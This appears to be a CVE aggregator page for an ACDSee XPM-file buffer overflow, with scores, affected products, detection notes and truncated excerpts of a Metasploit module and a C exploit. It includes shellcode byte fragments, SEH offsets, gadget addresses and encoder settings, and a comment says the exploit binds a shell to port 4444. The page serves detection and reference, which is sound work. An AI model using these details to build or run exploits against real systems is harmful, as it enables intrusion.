CVE-2007-2193
published 2007-04-24CVE-2007-2193: Stack-based buffer overflow in the ID_X.apl plugin in ACDSee 9.0 Build 108, Pro 8.1 Build 99, and Photo Editor 4.0 Build 195 allows user-assisted remote…
PriorityP349critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
36.57%
98.3th percentile
Stack-based buffer overflow in the ID_X.apl plugin in ACDSee 9.0 Build 108, Pro 8.1 Build 99, and Photo Editor 4.0 Build 195 allows user-assisted remote attackers to execute arbitrary code via a crafted XPM file with a long section string. NOTE: some of these details are obtained from third party information.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| acd_systems | acdsee | — | — |
| acd_systems | acdsee | — | — |
| acd_systems | photo_editor | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x2f\x2a\x20\x58\x50\x4d\x20\x2a\x2f\x0d\x0a\x73\x74\x61\x74\x69\x63\x20\x63\x68\x61\x72\x20\x2a\x50\x69\x78\x6d\x61\x70\x5b\x5d\x20\x3d\x20\x7b\x0d\x0a\x22\x35\x30\x39\x20\x34\x33\x38\x20\x32\x35\x36\x20\x33\x22\x2c\x0d\x0a\x22
bytes↗
\x05\x03\x81\x7C
bytes↗
\x90\x90\xeb\x16\x2a\x02\xfc\x7f\x2a\x02\xfc\x7f
bytes↗
\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98\x11\xbe\xa7\x83\xeb\xfc\xe2\xf4\x64\xf9\xfa\xa7\x98\x11\x35\xe2
- →Metasploit exploit constructs XPM payload with 4200+ bytes of alphanumeric-upper filler followed by SEH overwrite; detect XPM files with abnormally long section header strings ↗
- →Exploit uses SEH-based overwrite technique (pop/pop/ret gadget) at offset 0x10a4 within the evil buffer; monitor for SEH chain corruption when ACDSee or ACDSeeQV processes XPM files ↗
- →Exploit payload uses AlphanumUpper encoder with BadChars \x00 and StackAdjustment of -3500; encoded shellcode in XPM section body will be fully alphanumeric uppercase ↗
- →Crafted XPM file structure starts with '/* XPM */' magic header followed by a static char array declaration; files exploiting this CVE will have this header followed by an oversized buffer ↗
- ·The RET address 0x10020758 is specific to ACDSee 9.0 Build 1008 only; the exploit will not work against other builds without a different return address ↗
- ·The 'call ebx' gadget at 0x7C810305 (kernel32) is specific to ACDSee 9.0 (ACDsee9.exe), while the pop/pop/ret gadget works for both ACDsee9.exe and ACDSeeQV.exe ↗
- ·The proof-of-concept exploit was tested only against Windows XP SP2 FR (French); reliability on other OS versions or service packs is not confirmed ↗
- ·Metasploit module sets DisablePayloadHandler to true and EXITFUNC to process; the generated file is purely a client-side file-format exploit requiring user interaction to open the XPM ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)
exploitdb·2010-09-25
CVE-2007-2193 ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)
ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)
---
##
# $Id: acdsee_xpm.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ACDSee XPM File Section Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in ACDSee 9.0.
When viewing a malicious XPM file with the ACDSee product,
a remote attacker could overflow a buffer and execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => 'MC',
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2007-2193' ],
[ 'OSVDB',
Exploit-DB
ACDSee 9.0 - '.xpm' Local Buffer Overflow
exploitdb·2007-04-22
CVE-2007-2193 ACDSee 9.0 - '.xpm' Local Buffer Overflow
ACDSee 9.0 - '.xpm' Local Buffer Overflow
---
/*****************************************************************************
* ACDSee v9.0 .XPM File Buffer Overflow *
* *
* *
* ACDSee is vulnerable to an unspecified buffer overflow when processing a *
* crafted .XPM file. *
* This exploit runs calc.exe or binds shell to port 4444, and works against *
* ACDSee and ACDSee Quick View. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98"
Metasploit
ACDSee XPM File Section Buffer Overflow
metasploit
ACDSee XPM File Section Buffer Overflow
ACDSee XPM File Section Buffer Overflow
This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code.
No writeups or analysis indexed.
http://osvdb.org/35236http://secunia.com/advisories/24994http://www.acdsee.com/support/knowledgebase/article?id=2800http://www.securityfocus.com/bid/23620http://www.vupen.com/english/advisories/2007/1489https://exchange.xforce.ibmcloud.com/vulnerabilities/33812https://www.exploit-db.com/exploits/3776http://osvdb.org/35236http://secunia.com/advisories/24994http://www.acdsee.com/support/knowledgebase/article?id=2800http://www.securityfocus.com/bid/23620http://www.vupen.com/english/advisories/2007/1489https://exchange.xforce.ibmcloud.com/vulnerabilities/33812https://www.exploit-db.com/exploits/3776
2007-04-24
Published